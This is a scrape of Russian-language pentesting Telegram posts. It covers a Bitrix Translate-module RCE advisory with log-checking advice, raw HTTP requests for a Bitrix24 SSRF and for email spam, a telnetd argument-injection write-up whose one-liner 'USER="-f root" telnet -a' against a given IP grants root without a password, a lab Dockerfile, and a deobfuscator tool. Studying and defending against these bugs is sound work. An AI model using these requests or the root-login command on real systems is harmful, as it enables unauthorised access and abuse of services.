1C-Bitrix <= 25.100.500 (Translate Module) Remote Code Execution Vulnerability (CVE-2025-67887) 🥤
Исследователь слил RCE PoC под плагин в Битрикс через 3 дня после присвоения CVE, не дождавшись ответа вендора. Патча нет...
Vulnerability discovered by Egidio Romano.
Уязвимые версии:
Версия 25.100.500 и более ранние версии.
Описание уязвимости:
Уязвимость находится в «Translate Module», который позволяет пользователям загружать и распаковывать архивные файлы во временную папку. Однако приложение не проверяет должным образом содержимое этих архивов перед их распаковкой. Злоумышленники могут использовать эту уязвимость для загрузки и выполнения произвольного PHP-кода, включив в архив PHP-файл вместе со специально созданным файлом .htaccess.
Что делать:
1. Проверить в логах наличие обращений к
/bitrix/services/main/ajax.php?action=translate.asset.grabber.extract
и
/bitrix/services/main/ajax.php?action=translate.asset.grabber.apply
2. Проверить директории с файлами на наличие закладок и подозрительных архивов.
3. По возможности ограничить доступ к этим эндпоинтам (проверить привилегии) или временно отключить модуль, ждать патч🤷♀️
CVE-2025-67887
Ps. Битрикс не считает это уязвимостью
💫 @pentestnotes
Исследователь слил RCE PoC под плагин в Битрикс через 3 дня после присвоения CVE, не дождавшись ответа вендора. Патча нет...
Vulnerability discovered by Egidio Romano.
Уязвимые версии:
Версия 25.100.500 и более ранние версии.
Описание уязвимости:
Уязвимость находится в «Translate Module», который позволяет пользователям загружать и распаковывать архивные файлы во временную папку. Однако приложение не проверяет должным образом содержимое этих архивов перед их распаковкой. Злоумышленники могут использовать эту уязвимость для загрузки и выполнения произвольного PHP-кода, включив в архив PHP-файл вместе со специально созданным файлом .htaccess.
Что делать:
1. Проверить в логах наличие обращений к
/bitrix/services/main/ajax.php?action=translate.asset.grabber.extract
и
/bitrix/services/main/ajax.php?action=translate.asset.grabber.apply
2. Проверить директории с файлами на наличие закладок и подозрительных архивов.
3. По возможности ограничить доступ к этим эндпоинтам (проверить привилегии) или временно отключить модуль, ждать патч
CVE-2025-67887
Ps. Битрикс не считает это уязвимостью
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥12❤8🤯5👾1
Коллега по цеху @ArroizX сделал пост по уязвимостям в Битрикс😊
Почитать можно тут:
https://news.1rj.ru/str/ArroizX_Notes/90
Авторизированная SSRF в Битрикс24 через интеграцию с MS Sharepoint
Неавторизированный спам электронными письмами через sender_sub_confirm.php
Пойду докину в свой гайд, спасибо)
💫 @pentestnotes
Почитать можно тут:
https://news.1rj.ru/str/ArroizX_Notes/90
Авторизированная SSRF в Битрикс24 через интеграцию с MS Sharepoint
GET /bitrix/components/bitrix/sharepoint.link/ajax.php?mode=test&sp_server=http://collaborator&sp_user=&sp_pass=&sessid=... HTTP/1.1
Host: bitrix24
Cookie: ...
Bx-Ajax: true
Неавторизированный спам электронными письмами через sender_sub_confirm.php
POST /bitrix/tools/sender_sub_confirm.php HTTP/1.1
Host: bitrix
Cookie: ...
Content-Type: application/x-www-form-urlencoded
Content-Length: x
sessid=...&sender_subnoscription=add&SENDER_SUBSCRIBE_EMAIL=some@some.com
Пойду докину в свой гайд, спасибо)
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Заметки склерозного вебера
Решил сделать последний в этом году пост про наш любимый битрикс:
Авторизированная SSRF в Битрикс24 через интеграцию с MS Sharepoint
В Битрикс24 существует возможность интеграции с MS Sharepoint для синхронизации различных списков: клиенты, календарь и…
Авторизированная SSRF в Битрикс24 через интеграцию с MS Sharepoint
В Битрикс24 существует возможность интеграции с MS Sharepoint для синхронизации различных списков: клиенты, календарь и…
❤16
Закрытое награждение 25 лучших исследователей Standoff 2025 года
Очень классная локация и сам ивент, спасибо организаторам!👍
💫 @pentestnotes
Очень классная локация и сам ивент, спасибо организаторам!
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍23🔥13❤7🗿1
Forwarded from вольтаж
взломать интернет бесплатно 2026
вот эта штука сверху, которой уже назначен CVE-2026-24061, дает подключиться по telnet сразу как root, без пароля.
что?🐱
Давным давно в 2015 году, почему-то в нашей мировой линии, telnet был неуязвим, но в нём не работал автологин если на машине нет Kerberos.
Суть автологина - автоматически передать юзернейм для логина. Как когда по ssh коннектишься не указав логин, машина автоматически коннектится с именем текущего юзера.
Без Kerberos, этот юзернейм попросту не детектился.
Поэтому разработчики обновили шаблон логина, добавив динамический аргумент %U, что как раз подставляет юзернейм.
Новый шаблон:
и вот тут происходит кабум бабах ракета взрыв🤯
1. В бинаре
2. По RFC 1572, подключаясь по telnet, ты можешь сдать переменные окружения, в том числе
3. содержимое
. . .
Теперь перечитай эксплойт
Да это же уязвимость наargument injection!
Повторим флоу атаки🃏
0. выставляем переменную
1. переменная
2.
3. сервер получает команду
4. бинарь
5. поздравляю,
Dockerfile для тестовой лабы
Если хочешь кишки кода и ветви логики, то читай этот подробный ресерч
USER="-f root" telnet -a 104.16.149.244 23
вот эта штука сверху, которой уже назначен CVE-2026-24061, дает подключиться по telnet сразу как root, без пароля.
что?
Давным давно в 2015 году, почему-то в нашей мировой линии, telnet был неуязвим, но в нём не работал автологин если на машине нет Kerberos.
Суть автологина - автоматически передать юзернейм для логина. Как когда по ssh коннектишься не указав логин, машина автоматически коннектится с именем текущего юзера.
Без Kerberos, этот юзернейм попросту не детектился.
Поэтому разработчики обновили шаблон логина, добавив динамический аргумент %U, что как раз подставляет юзернейм.
Новый шаблон:
/usr/bin/login " -p -h %h %?u{-f %u}{%U}"и вот тут происходит кабум бабах ракета взрыв
1. В бинаре
login есть флаг -f, нужный для "этот юзер уже был аутентифицирован где-то ещё, не надо его проверять снова"2. По RFC 1572, подключаясь по telnet, ты можешь сдать переменные окружения, в том числе
$USER с целевым логином3. содержимое
$USER переменной никак не санитизируется. . .
Теперь перечитай эксплойт
USER="-f root" telnet -a 104.16.149.244 23
Да это же уязвимость на
Повторим флоу атаки
0. выставляем переменную
$USER="-f root" и включаем автологин -a1. переменная
$USER не проверяется, но учитывается сервером2.
$USER подставляется в шаблон логина вместо {%U}3. сервер получает команду
/usr/bin/login -p -f root4. бинарь
login скипает аутентификацию из-за -f5. поздравляю,
ты root
———Dockerfile для тестовой лабы
FROM debian:11-slim
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*
RUN useradd user1 && \
sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf
COPY docker-entrypoint.sh /docker-entrypoint.sh
EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]
Если хочешь кишки кода и ветви логики, то читай этот подробный ресерч
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥28❤7🗿5🥰2❤🔥1
Мне тут доложили, что hh.ru вышел в паблик на Standoff Bug Bounty
Интересно, примут ли мой отчёт, если у меня нет 15 лет опыта bug bounty и миллиона сертификатов🔍
💫 @pentestnotes
Интересно, примут ли мой отчёт, если у меня нет 15 лет опыта bug bounty и миллиона сертификатов
Please open Telegram to view this post
VIEW IN TELEGRAM
1😁43🌚6🤷♂2🥰2❤1🗿1
DeBix (Деобфускатор Bitrix)
🔍 Вы знали, что модули Bitrix, поставляемые через Marketplace в демо-режиме, проходят через автоматический обфускатор? (см. Фото)
Встроенный обфускатор переименовывает параметры функций и члены классов в файлах по типу include.php и install.php, что зачастую приводит к ошибкам в работе легитимного кода. Помимо этого, похожий обфусцировонный код встречается и при разборе инцидентов.
Чтобы не тратить часы на ручной разбор base64_decode и переменных вида $__254446073, я собрал DeBix (Deobfuscator Bitrix) — утилиту для восстановления читаемости кода.
Репозиторий проекта:
https://github.com/FaLLenSkiLL1/DeBix
💫 @pentestnotes
Встроенный обфускатор переименовывает параметры функций и члены классов в файлах по типу include.php и install.php, что зачастую приводит к ошибкам в работе легитимного кода. Помимо этого, похожий обфусцировонный код встречается и при разборе инцидентов.
Чтобы не тратить часы на ручной разбор base64_decode и переменных вида $__254446073, я собрал DeBix (Deobfuscator Bitrix) — утилиту для восстановления читаемости кода.
Репозиторий проекта:
https://github.com/FaLLenSkiLL1/DeBix
Please open Telegram to view this post
VIEW IN TELEGRAM
1❤31🔥16😁3👾2👍1